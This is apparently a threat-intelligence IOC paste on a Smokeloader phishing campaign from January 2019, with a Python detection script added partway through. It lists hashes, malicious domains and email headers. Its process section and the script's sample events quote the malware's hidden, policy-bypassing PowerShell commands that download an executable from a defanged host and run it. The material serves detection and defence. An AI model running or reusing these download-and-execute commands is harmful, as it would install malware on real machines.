#smokeloader_100119

VRad Jan 10th, 2019 (edited)
#IOC #OptiData #VR #smokeloader #WSH #LZH #Powershell

https://pastebin.com/hkskwKvc

previous contact:
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH > Powershell > GET > AppData\Local\TempZna40.exe

email_headers
--------------
Received: from relay.hvosting.ua (alt1-relay.hvosting.ua [91.200.40.211])
    by srv8.victim1.com for <user0@victim1.com>;
Received: from unallocated.sta.mtm.kiev.ua (unknown [178.54.46.113])
    (Authenticated sender: info@engineer3d.com.ua)
    by relay.hvosting.ua for <user0@victim1.com>;
    Thu, 10 Jan 2019 13:31:52 +0200 (EET)
From: Валя <info@engineer3d.com.ua>
Subject: Добрий день. К оплате за 10-е 2019р
To: "user0" <user0@victim1.com>

files
--------------
SHA-256 fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550
File name   рахунки.lzh          [LHarc 1.x/ARX archive data [lh0]]
File size   26.63 KB

SHA-256 a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520
File name   Pax_5451_10_01_2019p..docx  [Microsoft Word 2007+]   - CLEAN
File size   15.44 KB

SHA-256 ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd
File name   Pax_5451_10_01_2019p..js    [ASCII text]
File size   11.09 KB

SHA-256 d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878
File name   liter.exe           [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   544 KB

activity
**************

PL_SRC  musicaustriallc{.} ru/instadoc/liter.exe

C2      aviatorssm{.} bit/

netwrk
--------------
213.183.59.103  musicaustriallc{.} ru   GET /instadoc/liter.exe HTTP/1.1    Mozilla/5.0
[!This program cannot be run in DOS mode.]

comp
--------------
powershell.exe  3300    TCP 51187   176.53.161.182  80

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax_5451_10_01_2019p..js"
"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','%temp%Zna40.exe'); & start %temp%Zna40.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','C:\tmpZna40.exe');
C:\tmpZna40.exe
C:\Users\support\AppData\Local\TempZna40.exe

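Detection logic for the process chain in the proc section, added here as an illustration and not part of the paste or of any vendor product. The events are reconstructed from the command lines listed above; pids, ppids and the explorer.exe parent are invented, a benign PowerShell event is added for contrast, and the URL stays defanged exactly as the paste writes it. The scoring rules (script host running a script from a user profile folder, a shell descended from a script host, hidden/bypass/WebClient traits on the PowerShell command line, an executable launched from a temp directory by a shell) are the author's own choice of weights, not a published ruleset.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events rebuilt from the proc section; pids/ppids
# and the explorer.exe root are invented, the last event is a benign control.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax_5451_10_01_2019p..js"'},
    {"pid": 1200, "ppid": 1100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'''"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','%temp%Zna40.exe'); & start %temp%Zna40.exe'''},
    {"pid": 3300, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','C:\tmpZna40.exe');"},
    {"pid": 1400, "ppid": 3300, "image": r"C:\Users\support\AppData\Local\TempZna40.exe",
     "cmdline": r"C:\Users\support\AppData\Local\TempZna40.exe"},
    # Benign control: an admin script run from explorer, no hidden window, no download.
    {"pid": 1500, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -noprofile -File C:\Scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line traits seen in the proc section: (label, regex, weight).
PS_RULES = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("execution policy bypass", re.compile(r"-e(?:xecutionpolicy)?\s+bypass", re.I), 2),
    ("no profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("WebClient download", re.compile(r"Net\.WebClient.*downloadfile\s*\(", re.I | re.S), 3),
    ("custom User-Agent", re.compile(r"Headers\[\s*['\"]User-Agent['\"]\s*\]", re.I), 1),
    ("payload written to temp", re.compile(r"%temp%|\\AppData\\Local\\Temp|C:\\tmp", re.I), 2),
]
USER_DIR = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.I)
TEMP_IMAGE = re.compile(r"\\AppData\\Local\\Temp|^C:\\tmp", re.I)
THRESHOLD = 4


@dataclass
class Finding:
    pid: int
    image: str
    score: int
    reasons: list


def basename(path):
    """Lower-cased file name of a Windows path, quotes stripped."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def ancestor_names(event, by_pid, depth=3):
    """Image names of up to `depth` ancestors, nearest first."""
    names, cur = [], event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        names.append(basename(cur["image"]))
    return names


def analyze(events):
    """Score each process event against the chain traits; return those above THRESHOLD."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        ancestors = ancestor_names(e, by_pid)
        reasons, score = [], 0
        # 1. Script host executing a file from a user-writable profile folder.
        if name in SCRIPT_HOSTS and USER_DIR.search(e["cmdline"]):
            reasons.append("script host executing file from user profile"); score += 2
        # 2. cmd/powershell anywhere below a script host (WScript > cmd > powershell).
        if name in SHELLS and any(a in SCRIPT_HOSTS for a in ancestors):
            reasons.append("shell descended from script host"); score += 3
        # 3. PowerShell command-line traits, whether on the cmd /c line or the real process.
        if "powershell" in e["cmdline"].lower():
            for label, rx, weight in PS_RULES:
                if rx.search(e["cmdline"]):
                    reasons.append(label); score += weight
        # 4. Executable launched from a temp directory with a shell as direct parent.
        if TEMP_IMAGE.search(e["image"]) and ancestors and ancestors[0] in SHELLS:
            reasons.append("executable in temp dir launched by shell"); score += 4
        if score >= THRESHOLD:
            findings.append(Finding(e["pid"], name, score, reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid {f.pid} {f.image} score={f.score}: {', '.join(f.reasons)}")
```

The WScript event on its own scores only 2 and is not reported, which is deliberate: a script host opening a file from the Desktop is common; the alert comes from the cmd.exe and powershell.exe children that carry the hidden window, bypass and WebClient traits, and from the dropped executable launched out of the temp folder by PowerShell. The benign control event scores 1 for `-noprofile` alone and stays silent.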
persist
--------------
n/a (detects vm, sleeps)

drop
--------------
C:\tmpZna40.exe
C:\Users\support\AppData\Local\TempZna40.exe

# # #
https://www.virustotal.com/#/file/fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550/details
https://www.virustotal.com/#/file/a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520/details
https://www.virustotal.com/#/file/ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd/details
https://www.virustotal.com/#/file/d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878/details
https://analyze.intezer.com/#/analyses/3ba6c49c-8901-483a-8d2c-f626b1b4c298

VR

@